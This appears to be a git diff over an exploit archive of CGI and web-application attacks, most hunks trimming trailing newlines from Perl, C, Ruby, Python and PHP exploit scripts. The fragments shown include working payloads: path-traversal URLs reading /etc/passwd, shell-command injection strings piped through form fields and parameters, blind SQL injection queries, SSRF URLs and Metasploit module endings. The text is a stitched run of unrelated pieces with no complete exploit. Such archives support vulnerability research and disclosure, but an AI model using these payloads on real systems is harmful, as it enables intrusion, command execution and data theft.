Versions 1.4H and prior of BB4 Big Brother are susceptible to a directory traver http://target/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../directory -will display the contents of the specified directory. - +will display the contents of the specified directory. \ No newline at end of file diff --git a/platforms/cgi/remote/20165.html b/platforms/cgi/remote/20165.html index c78f8ff51..cdfe7f064 100755 --- a/platforms/cgi/remote/20165.html +++ b/platforms/cgi/remote/20165.html @@ -27,6 +27,4 @@ SIZE="-2" FACE="verdana, arial, helvetica">Account Manager LITE/PRO Admin Pas


To Use Modify Source To Point to amadmin.pl on TARGET Server

mail-me
- - - + \ No newline at end of file diff --git a/platforms/cgi/remote/20177.html b/platforms/cgi/remote/20177.html index d4de43087..4e401d4ac 100755 --- a/platforms/cgi/remote/20177.html +++ b/platforms/cgi/remote/20177.html @@ -36,4 +36,4 @@ Regardless of privilege level, any remote user can modify the administrative pas
To Use Modify Source To Point to subscribe.pl on TARGET Server

mail-me - + \ No newline at end of file diff --git a/platforms/cgi/remote/20194.pl b/platforms/cgi/remote/20194.pl index 0dfc55447..58b7cab60 100755 --- a/platforms/cgi/remote/20194.pl +++ b/platforms/cgi/remote/20194.pl @@ -81,4 +81,4 @@ close(SOCKET); sleep(3); system("xhost - $target"); print("\nAll done - hopefully you got the flying xterm!\n"); -exit(0) +exit(0) \ No newline at end of file diff --git a/platforms/cgi/remote/20238.txt b/platforms/cgi/remote/20238.txt index 5d5f981da..41052e000 100755 --- a/platforms/cgi/remote/20238.txt +++ b/platforms/cgi/remote/20238.txt @@ -22,5 +22,4 @@ Your domain example.com will be setup within 1 hour! Please click here to go back." -From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records. - +From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records. \ No newline at end of file diff --git a/platforms/cgi/remote/20387.txt b/platforms/cgi/remote/20387.txt index 5e4c82cf7..5c811a1b5 100755 --- a/platforms/cgi/remote/20387.txt +++ b/platforms/cgi/remote/20387.txt @@ -8,4 +8,4 @@ A malicious user could supply a string containing '/../'-type sequences and shel An attacker could easily create a malicious html form with a catsearch such as: -./../../../../../usr/bin/touch%20/tmp/foo| +./../../../../../usr/bin/touch%20/tmp/foo| \ No newline at end of file diff --git a/platforms/cgi/remote/20405.pl b/platforms/cgi/remote/20405.pl index 600a4b823..8da899426 100755 --- a/platforms/cgi/remote/20405.pl +++ b/platforms/cgi/remote/20405.pl @@ -47,4 +47,4 @@ elsif ($action eq "q") { exit; } } -# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)] +# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)] \ No newline at end of file diff --git a/platforms/cgi/remote/20423.txt b/platforms/cgi/remote/20423.txt index 014523a07..96f868c85 100755 --- a/platforms/cgi/remote/20423.txt +++ b/platforms/cgi/remote/20423.txt @@ -13,5 +13,4 @@ sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/:/bin/false -[...] - +[...] \ No newline at end of file diff --git a/platforms/cgi/remote/20430.txt b/platforms/cgi/remote/20430.txt index 980e28432..bb12762f0 100755 --- a/platforms/cgi/remote/20430.txt +++ b/platforms/cgi/remote/20430.txt @@ -9,6 +9,4 @@ You have new mail. $ Remotely: -http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient from_$1_to_$2/$PORT.log 2>&1 let PORT=PORT+1 -done +done \ No newline at end of file diff --git a/platforms/cgi/remote/20523.pl b/platforms/cgi/remote/20523.pl index becc35042..8ecd9b782 100755 --- a/platforms/cgi/remote/20523.pl +++ b/platforms/cgi/remote/20523.pl @@ -189,4 +189,4 @@ print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n Command: SCAN URL HELP QUIT"; print "\n\n\n\n\n\n\n\n\n\n\n"; -}; +}; \ No newline at end of file diff --git a/platforms/cgi/remote/20583.pl b/platforms/cgi/remote/20583.pl index 91392d9cf..4cf1b9da7 100755 --- a/platforms/cgi/remote/20583.pl +++ b/platforms/cgi/remote/20583.pl @@ -23,4 +23,4 @@ system({"wget"} "wget", $text, "-O/dev/null"); system({"wget"} "wget", $text, "-O/dev/null"); #system({"lynx"} "lynx", $text); #system({"lynx"} "lynx", $text); # if you don't have "wget" - # you can try with "Lynx" + # you can try with "Lynx" \ No newline at end of file diff --git a/platforms/cgi/remote/20606.pl b/platforms/cgi/remote/20606.pl index d1d63a0b6..4c532661e 100755 --- a/platforms/cgi/remote/20606.pl +++ b/platforms/cgi/remote/20606.pl @@ -112,5 +112,4 @@ Content-length: $contentlength $content __HEADER__ -close(HTTP); - +close(HTTP); \ No newline at end of file diff --git a/platforms/cgi/remote/20642.pl b/platforms/cgi/remote/20642.pl index 4d3e11b14..2cc3befd3 100755 --- a/platforms/cgi/remote/20642.pl +++ b/platforms/cgi/remote/20642.pl @@ -74,5 +74,4 @@ sub banner { sub usage { print "Usage:\tperl $0 \n\n"; -} - +} \ No newline at end of file diff --git a/platforms/cgi/remote/20689.pl b/platforms/cgi/remote/20689.pl index bc4ddab62..1ace20c08 100755 --- a/platforms/cgi/remote/20689.pl +++ b/platforms/cgi/remote/20689.pl @@ -72,4 +72,4 @@ connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$exploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); -# Tested on Redhat 6.2 - aspseek-1.0.3 - Tue Mar 20 18:09:44 2001 +# Tested on Redhat 6.2 - aspseek-1.0.3 - Tue Mar 20 18:09:44 2001 \ No newline at end of file diff --git a/platforms/cgi/remote/20744.pl b/platforms/cgi/remote/20744.pl index f87bf905a..455f04632 100755 --- a/platforms/cgi/remote/20744.pl +++ b/platforms/cgi/remote/20744.pl @@ -104,5 +104,4 @@ sub sendraw { print $pstr; my @in=; select(STDOUT); close(S); return @in; - } else { die("Can't connect...\n"); }} - + } else { die("Can't connect...\n"); }} \ No newline at end of file diff --git a/platforms/cgi/remote/20780.c b/platforms/cgi/remote/20780.c index 84e2774c8..848441057 100755 --- a/platforms/cgi/remote/20780.c +++ b/platforms/cgi/remote/20780.c @@ -220,4 +220,4 @@ command, NORMAL); ataque(resolver(argv[1]), command); return 0; -} +} \ No newline at end of file diff --git a/platforms/cgi/remote/20799.c b/platforms/cgi/remote/20799.c index e94ee2c01..a01198f97 100755 --- a/platforms/cgi/remote/20799.c +++ b/platforms/cgi/remote/20799.c @@ -75,4 +75,4 @@ int main(int argc, char *argv[]) return(0); } -/* www.hack.co.za [21 July]*/ +/* www.hack.co.za [21 July]*/ \ No newline at end of file diff --git a/platforms/cgi/remote/20800.c b/platforms/cgi/remote/20800.c index 0d14e3395..827159dea 100755 --- a/platforms/cgi/remote/20800.c +++ b/platforms/cgi/remote/20800.c @@ -209,10 +209,4 @@ htmldata, target); printf("\n%s\n", htmldata); return 0; -} - - - - - - +} \ No newline at end of file diff --git a/platforms/cgi/remote/20801.c b/platforms/cgi/remote/20801.c index 0e1db96fc..bb7015dde 100755 --- a/platforms/cgi/remote/20801.c +++ b/platforms/cgi/remote/20801.c @@ -177,6 +177,4 @@ Networks

"; system("lynx plus.html"); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/cgi/remote/20849.pl b/platforms/cgi/remote/20849.pl index bec31825b..b25d88183 100755 --- a/platforms/cgi/remote/20849.pl +++ b/platforms/cgi/remote/20849.pl @@ -79,6 +79,4 @@ The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcbo EOF exit 1; -} - - +} \ No newline at end of file diff --git a/platforms/cgi/remote/20887.txt b/platforms/cgi/remote/20887.txt index 15d698bec..987e10272 100755 --- a/platforms/cgi/remote/20887.txt +++ b/platforms/cgi/remote/20887.txt @@ -10,5 +10,4 @@ Submit a request such as this to a vulnerable webserver: http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/motd%00 -This will result in the contents of '/etc/motd' being output. - +This will result in the contents of '/etc/motd' being output. \ No newline at end of file diff --git a/platforms/cgi/remote/20914.pl b/platforms/cgi/remote/20914.pl index 2e5c5cf6b..b9d415b4e 100755 --- a/platforms/cgi/remote/20914.pl +++ b/platforms/cgi/remote/20914.pl @@ -114,4 +114,4 @@ sub oops_the_sploit_did_not_work { print STDERR "The exploit didn't work on this host\nSorry...\n"; exit; -} +} \ No newline at end of file diff --git a/platforms/cgi/remote/20916.pl b/platforms/cgi/remote/20916.pl index 1b8f3d4a1..79f426dcf 100755 --- a/platforms/cgi/remote/20916.pl +++ b/platforms/cgi/remote/20916.pl @@ -114,4 +114,4 @@ sub oops_the_sploit_did_not_work { print STDERR "The exploit didn't work on this host\nSorry...\n"; exit; -} +} \ No newline at end of file diff --git a/platforms/cgi/remote/20935.pl b/platforms/cgi/remote/20935.pl index 58dd57d85..68c3640a3 100755 --- a/platforms/cgi/remote/20935.pl +++ b/platforms/cgi/remote/20935.pl @@ -104,4 +104,4 @@ sub oops_the_sploit_did_not_work { print STDERR "The exploit didn't work on this host\nSorry...\n"; exit; -} +} \ No newline at end of file diff --git a/platforms/cgi/remote/20982.pl b/platforms/cgi/remote/20982.pl index eac71f320..a3d9d5b52 100755 --- a/platforms/cgi/remote/20982.pl +++ b/platforms/cgi/remote/20982.pl @@ -150,4 +150,4 @@ sub oops_the_sploit_did_not_work { print STDERR "The exploit didn't work on this host\nSorry...\n"; exit; -} +} \ No newline at end of file diff --git a/platforms/cgi/remote/211.c b/platforms/cgi/remote/211.c index 6e46ca7e7..41ab6b47c 100755 --- a/platforms/cgi/remote/211.c +++ b/platforms/cgi/remote/211.c @@ -167,4 +167,4 @@ int main(int argc, char **argv) } -// milw0rm.com [2000-12-01] +// milw0rm.com [2000-12-01] \ No newline at end of file diff --git a/platforms/cgi/remote/21104.pl b/platforms/cgi/remote/21104.pl index a8452640e..698f732a3 100755 --- a/platforms/cgi/remote/21104.pl +++ b/platforms/cgi/remote/21104.pl @@ -177,4 +177,4 @@ note.. web directory is normally /var/www/html"; print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n\n\n\n\n\n\n\n\n\n\n\n"; -}; +}; \ No newline at end of file diff --git a/platforms/cgi/remote/21125.pl b/platforms/cgi/remote/21125.pl index cf00b3477..5ce776957 100755 --- a/platforms/cgi/remote/21125.pl +++ b/platforms/cgi/remote/21125.pl @@ -173,4 +173,4 @@ note.. web directory is normally /var/www/html"; print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n\n\n\n\n\n\n\n\n\n\n\n"; -}; +}; \ No newline at end of file diff --git a/platforms/cgi/remote/21129.java b/platforms/cgi/remote/21129.java index bc70afc62..4310e6138 100755 --- a/platforms/cgi/remote/21129.java +++ b/platforms/cgi/remote/21129.java @@ -117,4 +117,4 @@ public class IBillHack { System.err.println("--------------------------------------------------------------------"); } -} +} \ No newline at end of file diff --git a/platforms/cgi/remote/21287.pl b/platforms/cgi/remote/21287.pl index 58851e3dd..ef2ef7469 100755 --- a/platforms/cgi/remote/21287.pl +++ b/platforms/cgi/remote/21287.pl @@ -125,4 +125,4 @@ send(SOCKET, $exploit, 0) or die("Error: $!\n"); while () { print; } -close(SOCKET); +close(SOCKET); \ No newline at end of file diff --git a/platforms/cgi/remote/21340.pl b/platforms/cgi/remote/21340.pl index 846739c37..ad540b273 100755 --- a/platforms/cgi/remote/21340.pl +++ b/platforms/cgi/remote/21340.pl @@ -15,4 +15,4 @@ step => "submit" , emailaddr => "foo\@bar.com| id > /tmp/foo|"]; $res = $ua->request($req); print $res->as_string; -print "code", $res->code, "\n"; +print "code", $res->code, "\n"; \ No newline at end of file diff --git a/platforms/cgi/remote/22311.txt b/platforms/cgi/remote/22311.txt index 4dcff76f2..d0cfcf156 100755 --- a/platforms/cgi/remote/22311.txt +++ b/platforms/cgi/remote/22311.txt @@ -4,6 +4,4 @@ It has been reported that the Axis Video Servers do not properly handle input to http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input] -http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name] - - +http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name] \ No newline at end of file diff --git a/platforms/cgi/remote/22541.txt b/platforms/cgi/remote/22541.txt index be3bd26fd..36fa6f83d 100755 --- a/platforms/cgi/remote/22541.txt +++ b/platforms/cgi/remote/22541.txt @@ -4,5 +4,4 @@ Alt-N WebAdmin allows a remote user to access files that they should not be able NOTE: The user must have administrative privileges in WebAdmin to access these files. -http://server/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:\WINNT&File:Name=WIN.INI&View=ViewFile - +http://server/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:\WINNT&File:Name=WIN.INI&View=ViewFile \ No newline at end of file diff --git a/platforms/cgi/remote/22753.pl b/platforms/cgi/remote/22753.pl index 2753c55dc..53b358de3 100755 --- a/platforms/cgi/remote/22753.pl +++ b/platforms/cgi/remote/22753.pl @@ -199,6 +199,4 @@ for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){ sleep 1; } -# generate shellcode - - +# generate shellcode \ No newline at end of file diff --git a/platforms/cgi/remote/22754.pl b/platforms/cgi/remote/22754.pl index 024c6eebd..a160366ad 100755 --- a/platforms/cgi/remote/22754.pl +++ b/platforms/cgi/remote/22754.pl @@ -40,6 +40,4 @@ print $remote "GET /cgi-bin/search.cgi?ul=$exploit_string HTTP/1.0\n\n"; while ( <$remote> ) { print } -close $remote; - - +close $remote; \ No newline at end of file diff --git a/platforms/cgi/remote/24326.txt b/platforms/cgi/remote/24326.txt index 3460f774b..b9f986ebe 100755 --- a/platforms/cgi/remote/24326.txt +++ b/platforms/cgi/remote/24326.txt @@ -8,4 +8,4 @@ http://www.example.com/cgi-bin/search/show.pl?url=http://www.google.com http://www.example.com/cgi-bin/search/show.pl?url=http://192.168.0.1 http://www.example.com/cgi-bin/search/show.pl?url=http://localhost:8080 http://www.example.com/cgi-bin/search/show.pl?url=ftp://192.168.0.1 -http://www.example.com/cgi-bin/search/show.pl?url=ftp://username:password@192.168.0.1 +http://www.example.com/cgi-bin/search/show.pl?url=ftp://username:password@192.168.0.1 \ No newline at end of file diff --git a/platforms/cgi/remote/34777.rb b/platforms/cgi/remote/34777.rb index 3d05e05af..4732faf25 100755 --- a/platforms/cgi/remote/34777.rb +++ b/platforms/cgi/remote/34777.rb @@ -51,4 +51,4 @@ print_error("Command sent - non-200 reponse") end end - end + end \ No newline at end of file diff --git a/platforms/cgi/remote/36045.txt b/platforms/cgi/remote/36045.txt index 4481a3b41..ed76ca72d 100755 --- a/platforms/cgi/remote/36045.txt +++ b/platforms/cgi/remote/36045.txt @@ -11,5 +11,4 @@ http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&last=" http://www.example.com/cgi/surgeftpmgr.cgi?cmd=report_file&domainid=0&filter=" http://www.example.com/cgi/surgeftpmgr.cgi?cmd=user_admin&domainid=" -http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=" - +http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=" \ No newline at end of file diff --git a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb index 6202b2bc6..e8a42a9d3 100755 --- a/platforms/cgi/remote/40949.rb +++ b/platforms/cgi/remote/40949.rb @@ -437,4 +437,4 @@ while true end # If we get here then the exploit failed -puts "[-] Exploit finished. Failed to get a shell!" +puts "[-] Exploit finished. Failed to get a shell!" \ No newline at end of file diff --git a/platforms/cgi/webapps/10031.rb b/platforms/cgi/webapps/10031.rb index ebaf32cb3..6239f1732 100755 --- a/platforms/cgi/webapps/10031.rb +++ b/platforms/cgi/webapps/10031.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/1004.php b/platforms/cgi/webapps/1004.php index 3a8e3ca24..dcf45f72e 100755 --- a/platforms/cgi/webapps/1004.php +++ b/platforms/cgi/webapps/1004.php @@ -97,4 +97,4 @@ if (!$s0ck3t) { } ?> -# milw0rm.com [2005-05-20] +# milw0rm.com [2005-05-20] \ No newline at end of file diff --git a/platforms/cgi/webapps/1005.pl b/platforms/cgi/webapps/1005.pl index 39344b294..f35081e43 100755 --- a/platforms/cgi/webapps/1005.pl +++ b/platforms/cgi/webapps/1005.pl @@ -66,4 +66,4 @@ print "$$ if This Port was Close , This mean is That , You Hav'nt Permission to ### EOF ### -# milw0rm.com [2005-05-20] +# milw0rm.com [2005-05-20] \ No newline at end of file diff --git a/platforms/cgi/webapps/1039.pl b/platforms/cgi/webapps/1039.pl index 9bbabc45c..924d6e878 100755 --- a/platforms/cgi/webapps/1039.pl +++ b/platforms/cgi/webapps/1039.pl @@ -69,4 +69,4 @@ print "$$ if This Port was Close , This mean is That , You Haven't Permission t print "Enjoy ;)"; ### EOF ### -# milw0rm.com [2005-06-11] +# milw0rm.com [2005-06-11] \ No newline at end of file diff --git a/platforms/cgi/webapps/1040.c b/platforms/cgi/webapps/1040.c index 82f730acb..55dd2ae41 100755 --- a/platforms/cgi/webapps/1040.c +++ b/platforms/cgi/webapps/1040.c @@ -88,4 +88,4 @@ printf("Sending H3ll Packets...\n"); return 0; } -// milw0rm.com [2005-06-11] +// milw0rm.com [2005-06-11] \ No newline at end of file diff --git a/platforms/cgi/webapps/1041.pl b/platforms/cgi/webapps/1041.pl index 18b22637e..1d18ba368 100755 --- a/platforms/cgi/webapps/1041.pl +++ b/platforms/cgi/webapps/1041.pl @@ -121,4 +121,4 @@ print "- you do not have privileges to write in /tmp\n"; print "- Shell not vulnerable\n\n\n"; print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n\n"; -# milw0rm.com [2005-06-11] +# milw0rm.com [2005-06-11] \ No newline at end of file diff --git a/platforms/cgi/webapps/1048.pl b/platforms/cgi/webapps/1048.pl index 3af16fece..db157ee96 100755 --- a/platforms/cgi/webapps/1048.pl +++ b/platforms/cgi/webapps/1048.pl @@ -71,4 +71,4 @@ print $socket "Connection: close\n\n"; print "have nice shell..."; -# milw0rm.com [2005-06-15] +# milw0rm.com [2005-06-15] \ No newline at end of file diff --git a/platforms/cgi/webapps/1120.pl b/platforms/cgi/webapps/1120.pl index 050ef2872..36685ecd1 100755 --- a/platforms/cgi/webapps/1120.pl +++ b/platforms/cgi/webapps/1120.pl @@ -126,4 +126,4 @@ elsif($opt eq "upload") } print "done.\n"; -# milw0rm.com [2005-07-25] +# milw0rm.com [2005-07-25] \ No newline at end of file diff --git a/platforms/cgi/webapps/11723.pl b/platforms/cgi/webapps/11723.pl index 8668d8fb9..752350a9d 100755 --- a/platforms/cgi/webapps/11723.pl +++ b/platforms/cgi/webapps/11723.pl @@ -25,5 +25,4 @@ while (<>) { print get( $url . '?cmd=file&fn=|' . $_ . '|' ); print '$ '; } - - + \ No newline at end of file diff --git a/platforms/cgi/webapps/1194.c b/platforms/cgi/webapps/1194.c index bf7f1ce80..a6c8b9cc5 100755 --- a/platforms/cgi/webapps/1194.c +++ b/platforms/cgi/webapps/1194.c @@ -150,4 +150,4 @@ return 0; } -// milw0rm.com [2005-09-04] +// milw0rm.com [2005-09-04] \ No newline at end of file diff --git a/platforms/cgi/webapps/1236.pm b/platforms/cgi/webapps/1236.pm index 3f7d292cf..ea96d3a8b 100755 --- a/platforms/cgi/webapps/1236.pm +++ b/platforms/cgi/webapps/1236.pm @@ -186,4 +186,4 @@ sub VHost { 1; -# milw0rm.com [2005-09-27] +# milw0rm.com [2005-09-27] \ No newline at end of file diff --git a/platforms/cgi/webapps/12433.py b/platforms/cgi/webapps/12433.py index db086672a..ca09edcfa 100755 --- a/platforms/cgi/webapps/12433.py +++ b/platforms/cgi/webapps/12433.py @@ -66,4 +66,4 @@ def main(): instructions() if __name__ == "__main__": - sys.exit(main()) + sys.exit(main()) \ No newline at end of file diff --git a/platforms/cgi/webapps/12434.py b/platforms/cgi/webapps/12434.py index 40d64517b..142dd80c9 100755 --- a/platforms/cgi/webapps/12434.py +++ b/platforms/cgi/webapps/12434.py @@ -66,4 +66,4 @@ def main(): instructions() if __name__ == "__main__": - sys.exit(main()) + sys.exit(main()) \ No newline at end of file diff --git a/platforms/cgi/webapps/1471.pl b/platforms/cgi/webapps/1471.pl index 2355fce91..dfb49bccd 100755 --- a/platforms/cgi/webapps/1471.pl +++ b/platforms/cgi/webapps/1471.pl @@ -36,4 +36,4 @@ get("http://".$targ.$path.";".$comd."|") print "[+] Exploiting request done!\n"; print "Enjoy !"; -# milw0rm.com [2006-02-06] +# milw0rm.com [2006-02-06] \ No newline at end of file diff --git a/platforms/cgi/webapps/1508.pl b/platforms/cgi/webapps/1508.pl index b18409d50..f9353de0b 100755 --- a/platforms/cgi/webapps/1508.pl +++ b/platforms/cgi/webapps/1508.pl @@ -83,4 +83,4 @@ sub usage() print " e.g.: r57awstats.pl http://127.0.0.1/cgi-bin/awstats.pl\n"; } -# milw0rm.com [2006-02-17] +# milw0rm.com [2006-02-17] \ No newline at end of file diff --git a/platforms/cgi/webapps/15625.txt b/platforms/cgi/webapps/15625.txt index 3363e5583..8eb515236 100755 --- a/platforms/cgi/webapps/15625.txt +++ b/platforms/cgi/webapps/15625.txt @@ -8,4 +8,4 @@ # CVE : The follow xss is located in the section of comments of the CMS skeletonz Xss Exploit -field Name: field Comment: +field Name: field Comment: \ No newline at end of file diff --git a/platforms/cgi/webapps/15737.txt b/platforms/cgi/webapps/15737.txt index 0834e7470..9de6dcbe3 100755 --- a/platforms/cgi/webapps/15737.txt +++ b/platforms/cgi/webapps/15737.txt @@ -99,5 +99,4 @@ if data.find('SVG image not found. Possible causes are:') == -1: else: print '[-] Failed to retrive requested file. May not exist on host.' -conn.close() - +conn.close() \ No newline at end of file diff --git a/platforms/cgi/webapps/16006.html b/platforms/cgi/webapps/16006.html index a21f3db87..25d571e99 100755 --- a/platforms/cgi/webapps/16006.html +++ b/platforms/cgi/webapps/16006.html @@ -25,4 +25,4 @@ method="post" id="csrfplz"> - + \ No newline at end of file diff --git a/platforms/cgi/webapps/1669.pl b/platforms/cgi/webapps/1669.pl index c61db0873..c9e0493b5 100755 --- a/platforms/cgi/webapps/1669.pl +++ b/platforms/cgi/webapps/1669.pl @@ -41,4 +41,4 @@ else { print "Error with request.\n"; } -# milw0rm.com [2006-04-13] +# milw0rm.com [2006-04-13] \ No newline at end of file diff --git a/platforms/cgi/webapps/1670.pl b/platforms/cgi/webapps/1670.pl index 7cdf933bd..22bfcbb5c 100755 --- a/platforms/cgi/webapps/1670.pl +++ b/platforms/cgi/webapps/1670.pl @@ -45,4 +45,4 @@ else { print "Error with request.\n"; } -# milw0rm.com [2006-04-13] +# milw0rm.com [2006-04-13] \ No newline at end of file diff --git a/platforms/cgi/webapps/1677.php b/platforms/cgi/webapps/1677.php index c653fc0ed..359ef8408 100755 --- a/platforms/cgi/webapps/1677.php +++ b/platforms/cgi/webapps/1677.php @@ -143,4 +143,4 @@ sendpacketii($packet); echo $html; ?> -# milw0rm.com [2006-04-14] +# milw0rm.com [2006-04-14] \ No newline at end of file diff --git a/platforms/cgi/webapps/1680.pm b/platforms/cgi/webapps/1680.pm index 5557f3599..2c5e5ef97 100755 --- a/platforms/cgi/webapps/1680.pm +++ b/platforms/cgi/webapps/1680.pm @@ -246,4 +246,4 @@ sub VHost { 1; -# milw0rm.com [2006-04-15] +# milw0rm.com [2006-04-15] \ No newline at end of file diff --git a/platforms/cgi/webapps/16856.rb b/platforms/cgi/webapps/16856.rb index 4cabb0601..f4a217eac 100755 --- a/platforms/cgi/webapps/16856.rb +++ b/platforms/cgi/webapps/16856.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 10.0) end -end - +end \ No newline at end of file diff --git a/platforms/cgi/webapps/16857.rb b/platforms/cgi/webapps/16857.rb index d2952d91c..37a1c1b35 100755 --- a/platforms/cgi/webapps/16857.rb +++ b/platforms/cgi/webapps/16857.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/16886.rb b/platforms/cgi/webapps/16886.rb index 0d7ea1f77..977b142bf 100755 --- a/platforms/cgi/webapps/16886.rb +++ b/platforms/cgi/webapps/16886.rb @@ -109,4 +109,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/16891.rb b/platforms/cgi/webapps/16891.rb index c24e07fde..01fbf9904 100755 --- a/platforms/cgi/webapps/16891.rb +++ b/platforms/cgi/webapps/16891.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/cgi/webapps/16893.rb b/platforms/cgi/webapps/16893.rb index a58b11404..9f18fa395 100755 --- a/platforms/cgi/webapps/16893.rb +++ b/platforms/cgi/webapps/16893.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/16905.rb b/platforms/cgi/webapps/16905.rb index 9a2dd3f97..89cd2a32e 100755 --- a/platforms/cgi/webapps/16905.rb +++ b/platforms/cgi/webapps/16905.rb @@ -105,5 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/platforms/cgi/webapps/16908.rb b/platforms/cgi/webapps/16908.rb index 096fca8a9..0af6649cd 100755 --- a/platforms/cgi/webapps/16908.rb +++ b/platforms/cgi/webapps/16908.rb @@ -110,5 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Unknown response") end -end - +end \ No newline at end of file diff --git a/platforms/cgi/webapps/16914.rb b/platforms/cgi/webapps/16914.rb index 05c6ed964..b66e47d1f 100755 --- a/platforms/cgi/webapps/16914.rb +++ b/platforms/cgi/webapps/16914.rb @@ -83,4 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) end -end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/17259.txt b/platforms/cgi/webapps/17259.txt index 993ecd1cb..39e724d25 100755 --- a/platforms/cgi/webapps/17259.txt +++ b/platforms/cgi/webapps/17259.txt @@ -50,4 +50,4 @@ Referer: http://[webserver IP]/cgi-bin/ffileman.cgi?direkt=[original path]&kulla Disclosure: -2009-07-17 Fixed with version 8.0 +2009-07-17 Fixed with version 8.0 \ No newline at end of file diff --git a/platforms/cgi/webapps/17443.txt b/platforms/cgi/webapps/17443.txt index f2fe52deb..3a204d89b 100755 --- a/platforms/cgi/webapps/17443.txt +++ b/platforms/cgi/webapps/17443.txt @@ -27,5 +27,4 @@ http://localhost/[PATH]/search.cgi?keywords3= # Blind SQL Injection: http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''=' -http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''=' - +http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''=' \ No newline at end of file diff --git a/platforms/cgi/webapps/1755.py b/platforms/cgi/webapps/1755.py index e6a7cd545..91bde8082 100755 --- a/platforms/cgi/webapps/1755.py +++ b/platforms/cgi/webapps/1755.py @@ -128,4 +128,4 @@ red = rbawstatsMigrate(url, user, pas, chst, cprt) red.probe() -# milw0rm.com [2006-05-06] +# milw0rm.com [2006-05-06] \ No newline at end of file diff --git a/platforms/cgi/webapps/17577.txt b/platforms/cgi/webapps/17577.txt index 5ba029db6..8a0e14e25 100755 --- a/platforms/cgi/webapps/17577.txt +++ b/platforms/cgi/webapps/17577.txt @@ -27,4 +27,4 @@ winbindd_start, winbindd_stop, winbindd_restart : To start/stop/restart winbindd Thanks & Regards, Narendra. -Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium. +Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium. \ No newline at end of file diff --git a/platforms/cgi/webapps/177.pl b/platforms/cgi/webapps/177.pl index f0959e278..97e42bf01 100755 --- a/platforms/cgi/webapps/177.pl +++ b/platforms/cgi/webapps/177.pl @@ -189,4 +189,4 @@ sub sendraw { } } -# milw0rm.com [2000-11-15] +# milw0rm.com [2000-11-15] \ No newline at end of file diff --git a/platforms/cgi/webapps/179.c b/platforms/cgi/webapps/179.c index 73a736c76..c656192c6 100755 --- a/platforms/cgi/webapps/179.c +++ b/platforms/cgi/webapps/179.c @@ -358,4 +358,4 @@ int main(int argc, char **argv) } -// milw0rm.com [2000-11-15] +// milw0rm.com [2000-11-15] \ No newline at end of file diff --git a/platforms/cgi/webapps/17922.rb b/platforms/cgi/webapps/17922.rb index 64587367f..6a3817927 100755 --- a/platforms/cgi/webapps/17922.rb +++ b/platforms/cgi/webapps/17922.rb @@ -149,4 +149,4 @@ Content-Length: length long - + \ No newline at end of file diff --git a/platforms/cgi/webapps/18153.txt b/platforms/cgi/webapps/18153.txt index 3f30c4315..e44641bb8 100755 --- a/platforms/cgi/webapps/18153.txt +++ b/platforms/cgi/webapps/18153.txt @@ -20,5 +20,4 @@ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322 Cookie: sessionID=1;KohaOpacLanguage=../../../../../../../../etc/passwd%00 Connection: Close Pragma: 